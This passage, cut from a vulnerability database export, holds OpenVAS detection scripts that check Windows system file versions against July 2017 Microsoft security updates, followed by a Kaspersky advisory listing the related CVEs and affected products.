vulnerable_range:'Less than 6.3.9600.18737');\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025337", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811519", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310811519", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025337)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025337)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811519\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8563\",\n \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\", \"CVE-2017-8577\",\n \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\", \"CVE-2017-8582\",\n \"CVE-2017-8587\", \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\",\n \"CVE-2017-8592\");\n script_bugtraq_id(99389, 99409, 99414, 99424, 99439, 99398, 99402, 99428, 99394,\n 99431, 99416, 99419, 99421, 99423, 99429, 99413, 99400, 99425,\n 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:12:05 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025337)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025337\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - When Microsoft Browsers improperly handle redirect requests.\n\n - In Microsoft Windows when Win32k fails to properly handle objects in memory.\n\n - In Windows when the Microsoft Graphics Component fails to properly handle\n objects in memory.\n\n - In Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - When Windows improperly handles objects in memory.\n\n - In the Windows System Information Console when it improperly parses\n XML input containing a reference to an external entity.\n\n - In Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - In the way that Microsoft WordPad parses specially crafted files.\n\n - When Windows Search handles objects in memory.\n\n - When the Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel\n Address Space Layout Randomization (KASLR) bypass.\n\n - In PowerShell when PSObject wraps a CIM Instance.\n\n - When Windows Explorer attempts to open a non-existent file.\n\n - In the Windows Performance Monitor Console when it improperly parses XML\n input containing a 
reference to an external entity.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, to obtain information to further\n compromise the user's system, to run arbitrary code in kernel mode, to run\n processes in an elevated context, to run arbitrary code in the context of\n another user, to read arbitrary files via an XML external entity (XXE)\n declaration, to bypass Extended Protection for Authentication, take control\n of the affected system, retrieve the base address of the kernel driver from\n a compromised process, execute malicious code on a vulnerable system, cause\n a denial of service, obtain information to further compromise the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025337\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23848\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23848\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025343", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811464", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310811464", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811464\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99389, 99409, 99414, 99424, 99439, 99398, 99426, 99397, 99402,\n 99428, 99394, 99431, 99416, 99419, 99421, 99423, 99429, 99413,\n 99400, 
99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:58:32 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025343\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - When Win32k fails to properly handle objects in memory.\n\n - When the Microsoft Graphics Component fails to properly handle\n objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - When Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The way that Microsoft WordPad parses specially crafted files.\n\n - When Windows Explorer attempts to open a non-existent file.\n\n - When Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as\n the current user, run arbitrary code and processes with elevated privileges,\n take control of the affected system and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025343\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22210\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22210\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025341", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811516", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310811516", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025341)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025341)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811516\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8602\", \"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\",\n \"CVE-2017-8486\", \"CVE-2017-8495\", \"CVE-2017-8618\", \"CVE-2017-8556\",\n \"CVE-2017-8557\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99390, 99389, 99409, 99414, 99424, 99399, 99439, 99398, 99402,\n 99428, 99394, 99431, 99416, 99419, 99421, 99423, 99429, 99413,\n 99400, 99425, 99427, 99396);\n 
script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:43:16 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025341)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025341\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists when,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor 
Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary\n code in the context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated context, retrieve the\n base address of the kernel driver from a compromised process, embed an\n ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025341\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"clfs.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23841\"))\n{\n report = 'File checked: ' + sysPath + \"\\clfs.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23841\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8556", "CVE-2017-8467", "CVE-2017-8581", "CVE-2017-8577"], "description": "This host is missing an important security\n update according to Microsoft KB4025877", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811224", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025877)", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025877)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811224\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8556\", \"CVE-2017-8573\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\");\n script_bugtraq_id(99409, 99414, 99439, 99431, 99416, 99419, 99421, 99423);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:05:15 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025877)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4025877\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - Microsoft Windows Graphics Component fails to properly handle objects in\n memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain access to sensitive information to further compromise the user's\n system, run arbitrary code in kernel mode and run processes in an elevated\n context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19816\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19816\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24135\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24135\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + 
\"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:47:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 
Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8486](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8486>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8608>) \n[CVE-2017-8467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8467>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8606>) \n[CVE-2017-8463](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8463>) \n[CVE-2017-8563](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8563>) \n[CVE-2017-8590](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8590>) \n[CVE-2017-8564](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8564>) \n[CVE-2017-8565](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8565>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8607>) \n[CVE-2017-8618](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8618>) 
\n[CVE-2017-8592](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8592>) \n[CVE-2017-8495](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8495>) \n[CVE-2017-8557](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8557>) \n[CVE-2017-8556](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8556>) \n[CVE-2017-8573](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8573>) \n[CVE-2017-8577](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8577>) \n[CVE-2017-8578](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8578>) \n[CVE-2017-0170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0170>) \n[CVE-2017-8588](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8588>) \n[CVE-2017-8589](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8589>) \n[CVE-2017-8587](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8587>) \n[CVE-2017-8580](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8580>) \n[CVE-2017-8581](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8581>) \n[CVE-2017-8582](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8582>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0170>)0.0Unknown \n[CVE-2017-8463](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8463>)0.0Unknown \n[CVE-2017-8467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8467>)0.0Unknown \n[CVE-2017-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8486>)0.0Unknown 
